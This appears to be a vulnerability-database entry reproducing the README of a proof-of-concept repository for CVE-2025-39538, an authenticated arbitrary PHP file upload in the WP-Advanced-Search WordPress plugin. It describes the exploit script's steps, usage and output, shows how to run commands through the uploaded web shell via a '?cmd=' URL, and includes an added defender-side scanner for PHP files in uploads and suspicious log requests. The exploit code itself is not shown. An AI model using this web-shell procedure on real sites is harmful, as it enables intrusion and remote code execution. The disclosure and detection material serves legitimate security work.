Related vulnerability
Description
WordPress WP-Advanced-Search <= 3.3.9.3 - Arbitrary File Upload Vulnerability
Introduction
# 🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Arbitrary File Upload
- **CVE ID:** CVE-2025-39538
- **Published:** 2025-04-16
- **Vulnerability Type:** Arbitrary File Upload (Unrestricted Upload of File with Dangerous Type)
- **Affected Plugin:** WP-Advanced-Search by Mathieu Chartier
- **Affected Versions:** All versions up to and including 3.3.9.3
This vulnerability allows an authenticated attacker to upload a malicious PHP file (such as a web shell) to the server using the import functionality provided by the plugin. The uploaded file is placed under the WordPress uploads directory and could lead to remote code execution.
🧱 Upload path:
```
wp-content/uploads/2025/04/
```
---
## ⚙️ About the Exploit Script
This Python script performs the following actions:
1. Logs into the WordPress site using provided credentials.
2. Extracts the required `wp_advanced_search_up_nonce` from the import/export admin page.
3. Uploads a web shell (PHP file) via a crafted POST request.
---
## 🚀 Usage
```bash
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password
```
### 🖥️ Example Output:
```
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
```
---
## 🐚 Using the Uploaded Shell
After the upload, you can access your shell like this:
```
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
```
Replace `whoami` with any Linux command you want to execute, for example:
- `id` — shows current user ID.
- `pwd` — shows current directory.
- `ls` — lists files.
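A defender-side check, added here and not part of the original repository or the plugin: the uploads tree should never contain executable PHP, so a scan of `wp-content/uploads` for PHP-like files plus a filter over access-log lines that request a `.php` path under uploads both catch the footprint described above. The directory layout, log lines and regex names are constructed for this example.

```python
import os
import re
import tempfile

# PHP-like extensions; nothing under wp-content/uploads should ever carry one.
PHP_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)

# Request line of a combined-format access log that fetches a PHP file under
# uploads, with an optional query string (the README's shell is driven by ?cmd=).
UPLOADS_PHP_REQUEST = re.compile(
    r'"(?:GET|POST) (/wp-content/uploads/[^" ]*\.(?:php\d?|phtml|phar))(\?[^" ]*)? HTTP/'
)

def find_php_in_uploads(uploads_dir):
    """Return sorted '/'-separated paths (relative to uploads_dir) of PHP-like files."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            if PHP_EXT.search(name):
                rel = os.path.relpath(os.path.join(root, name), uploads_dir)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)

def flag_log_lines(lines):
    """Return (path, query) for every access-log line requesting a PHP file under uploads."""
    flagged = []
    for line in lines:
        m = UPLOADS_PHP_REQUEST.search(line)
        if m:
            flagged.append((m.group(1), m.group(2) or ""))
    return flagged

# Constructed sample log lines (not real traffic); the third mirrors the README's shell URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Apr/2025:10:01:02 +0000] "GET /wp-content/uploads/2025/04/image.png HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Apr/2025:10:02:17 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
    '10.0.0.5 - - [16/Apr/2025:10:02:20 +0000] "GET /wp-content/uploads/2025/04/nxploit.php?cmd=whoami HTTP/1.1" 200 48',
]

def demo():
    """Build a constructed uploads tree with one stray PHP file and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "2025", "04"))
        for name in ("image.png", "nxploit.php"):
            open(os.path.join(tmp, "2025", "04", name), "w").close()
        files = find_php_in_uploads(tmp)
    return files, flag_log_lines(SAMPLE_LOG)
```

Denying PHP execution under `wp-content/uploads` at the web server removes the execution step even when an upload succeeds.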
---
## ⚠️ Disclaimer
This tool is intended for **educational and authorized security testing** purposes only.
The author is **not responsible** for any misuse or damage caused by this script.
---
_**By: Nxploited | Khaled Alenazi**_
File snapshot
```
[4.0K] /data/pocs/5b7af00c26cd7c3b0a970e72dce34af48b81dea9
├── [3.0K] CVE-2025-39538.py
├── [1.1K] LICENSE
├── [2.3K] README.md
└── [ 24] requirements.txt

0 directories, 4 files
```